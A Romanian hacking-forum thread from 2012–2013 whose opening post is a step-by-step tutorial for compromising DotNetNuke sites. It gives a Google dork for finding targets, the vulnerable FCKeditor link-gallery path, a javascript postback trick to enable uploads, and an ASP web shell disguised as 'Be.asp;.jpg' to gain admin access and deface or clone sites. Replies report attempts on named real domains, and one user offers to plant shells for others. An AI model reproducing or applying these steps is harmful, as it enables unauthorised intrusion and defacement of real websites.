Rhodium Posted December 22, 2012 Report Share Posted December 22, 2012 (edited) Acesta metoda se numeste DotNetNuke(DNN).1.Accesati google.ro si folositi acest dork:- :inurl:/tabid/36/language/en-US/Default.aspx2.Cautati un site vulnerabil si stergeti totul de dupa http://www.sitevulnerabil.com/ si copiati asta:/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx3.Acum aveti doua posibilitati.Daca va apare Link Gallery url ,inseamna ca siteul nu este vulnerabil.http://img208.imageshack.us/img208/9956/dnnu.jpgIar daca va apare o pagina ca in acesta fotografie atunci siteul este vulnerabil.4.In cazul in care gasiti un site vulnerabil treceti la urmatorul pas.5.Observati ca sunt 3 optiuni, dar noi vom selecta “File in your site”.6.Dupa ce am selectat, va trebuie sa folosim un "javascript code".Pentru asta va trebuie sa folosim un browser care suporta javascript.Asadar voi folosi Opera.Va trebuie sa alegem locatia fisierului ca fiind "root".Stergeti tot ce scris in browser si copiati acest cod.javascript:__doPostBack('ctlURL$cmdUpload','')7.Acum, dupa cum puteti vedea în imaginea de mai jos, vom avea optiunea de a incarca fi?iere.8.Nu puteti sa incarcati shell-ul direct in format .php.9.Asadar vom folosi un shell special care este codat un ASP.Il puteti descarca de aici:Be.asp;.jpg10.Dupa ce am descarcat shell-ul il vom uploada pe site.(sa nu schimbati extensia)11.Dupa ce a-ti incarcat fisierul puteti sa accesati shell-ul mergand la aceasta adresa: http://www.sitevulnerabil.com/portals/0/Be.asp;.jpg12.Acum va aparea ceva asemanator ca in imaginea de mai jos.http://img51.imageshack.us/img51/3481/shella.png13.Acum click pe <DIR>... pana cand veti gasi admin.14.Puteti sa editati siteul sau sa il clonati.In cazul in care acest tutorial va fost de folos puteti sa imi dati un like. Edited December 22, 2012 by Rhodium 1 Quote Link to comment Share on other sites More sharing options...
geogeo2007 Posted December 22, 2012 Report Share Posted December 22, 2012 foarte folositor tutorialul, dar daca se poate sa postezi unul si pentru un exploit mai nou cu RFI in php. Quote Link to comment Share on other sites More sharing options...
TestROOT. Posted December 22, 2012 Report Share Posted December 22, 2012 Multumesc pentru tutorial Quote Link to comment Share on other sites More sharing options...
asparcilius Posted December 26, 2012 Report Share Posted December 26, 2012 am descoperit 1 rotel > Home ms ptr tutorial:D Quote Link to comment Share on other sites More sharing options...
adi1234 Posted December 26, 2012 Report Share Posted December 26, 2012 Mersi mult. Quote Link to comment Share on other sites More sharing options...
boogy Posted December 26, 2012 Report Share Posted December 26, 2012 Mersi pentru tutorial Quote Link to comment Share on other sites More sharing options...
dr.d3v1l Posted December 26, 2012 Report Share Posted December 26, 2012 si cu google chrome faceti asa : f12 > console puneti script si ok Quote Link to comment Share on other sites More sharing options...
Cheater Posted December 26, 2012 Report Share Posted December 26, 2012 (edited) Lol, e arbitrary file upload, metoda, e o panarama de cms cu fackeditor vechi, vulnerabil.DotNetNuke este un cms vulneabil si n-are nici o legatura cu metoda, sau cine stie de noua gaura din covrig descoperita.O postare mai buna ar fi una cum ca ai descoperit un arbitrary file upload, intr-un cms, tu, nu luata de pe net, postare realizata dupa ce ai raportat vulnerabilitatea la producator. Edited December 26, 2012 by Cheater Quote Link to comment Share on other sites More sharing options...
BigNija Posted December 27, 2012 Report Share Posted December 27, 2012 (edited) Am incercat pe mai multe site-uri si primesc urmatoarea eroare:An Error Has Occurred When Attempting To Save The File E:\www\dzonny.cz(3b7cccb8694727720e8f126f1cb5ef85)\wwwroot\Portals\0\Be.asp.jpg. Please Contact Your Hosting Provider To Ensure The Appropriate Security Settings Have Been Enabled On The Server.sauAn Error Has Occurred When Attempting To Save The File C:\inetpub\wwwroot\DNN_Capetillo\Portals\0\Be.asp.jpg. Please Contact Your Hosting Provider To Ensure The Appropriate Security Settings Have Been Enabled On The Server. sauAn Error Has Occurred When Attempting To Save The File D:\www\rotel.ch\htdocs\Portals\0\Be.asp.jpg. Please Contact Your Hosting Provider To Ensure The Appropriate Security Settings Have Been Enabled On The Server.Gresesc eu cu ceva ? Edited December 27, 2012 by BigNija Quote Link to comment Share on other sites More sharing options...
ady22sb Posted February 23, 2013 Report Share Posted February 23, 2013 bun tuorialul...pentru noi astia mai incepatori.la ma multePS. tocmai ce l-am ars pe unu cu o metoda asemanatoare. Quote Link to comment Share on other sites More sharing options...
chioara3 Posted February 24, 2013 Report Share Posted February 24, 2013 Am facut tot ce trebuia... dar cand dau enter dupa ce am pus : /portals/0/Be.asp;.jpg nu-mi apare alea.. imi apare doar o imagine mica in centru pe care scrie image.Help plz. Quote Link to comment Share on other sites More sharing options...
XoddX Posted February 24, 2013 Report Share Posted February 24, 2013 Am uploadat acel sheel dat de tine, am mers la adresa http://www.site-ulmeu.ro/portals/0/Be.asp;.jpg si imi apare:PozaOare am gresit undeva? Quote Link to comment Share on other sites More sharing options...
chioara3 Posted February 24, 2013 Report Share Posted February 24, 2013 Exact asa imi apare si mie xodd.. Quote Link to comment Share on other sites More sharing options...
Mr.Kode Posted February 24, 2013 Report Share Posted February 24, 2013 Am facut tot ce trebuia... dar cand dau enter dupa ce am pus : /portals/0/Be.asp;.jpg nu-mi apare alea.. imi apare doar o imagine mica in centru pe care scrie image.Help plz.Si mie tot asa.. Quote Link to comment Share on other sites More sharing options...
chioara3 Posted February 24, 2013 Report Share Posted February 24, 2013 O sa caut in tutoriale si revin cu edit. Quote Link to comment Share on other sites More sharing options...
nein Posted February 24, 2013 Report Share Posted February 24, 2013 (edited) e vechie metoda , chiar postata de mine de user DANISR [cand am loat ban ] https://rstforums.com/forum/30562-tutorial-dnn-deface.rst datimi pm cu siteurile dnn si va uploadez eu shell .. Edited February 24, 2013 by nein Quote Link to comment Share on other sites More sharing options...
TheMaster... Posted February 24, 2013 Report Share Posted February 24, 2013 foarte bun! Quote Link to comment Share on other sites More sharing options...
XoddX Posted February 24, 2013 Report Share Posted February 24, 2013 foarte bun!Foarte bun ce? Ai probat pe un site si a mers? Lasati comentariile aiurea pentru +1 Quote Link to comment Share on other sites More sharing options...
TheArthist Posted February 24, 2013 Report Share Posted February 24, 2013 (edited) Nice.. Edited February 24, 2013 by TheArthist :) Quote Link to comment Share on other sites More sharing options...
XoddX Posted February 25, 2013 Report Share Posted February 25, 2013 e vechie metoda , chiar postata de mine de user DANISR [cand am loat ban ] https://rstforums.com/forum/30562-tutorial-dnn-deface.rst datimi pm cu siteurile dnn si va uploadez eu shell ..Da-mi si mie un PM cum faci ca sa urci shell-ul... MC Quote Link to comment Share on other sites More sharing options...
mafia27 Posted April 16, 2013 Report Share Posted April 16, 2013 ForbiddenYou do not have permission to access this document.Web Server at vluchtenburg.nlNu mi-a mers tutorialul Quote Link to comment Share on other sites More sharing options...
TakeCode Posted June 20, 2013 Report Share Posted June 20, 2013 Testat merge 100% Quote Link to comment Share on other sites More sharing options...
florinul Posted June 28, 2013 Report Share Posted June 28, 2013 nu prea am inteles prea multe Quote Link to comment Share on other sites More sharing options...
d33nis Posted July 15, 2013 Report Share Posted July 15, 2013 e invechita metoda si nu mai este functionala. Quote Link to comment Share on other sites More sharing options...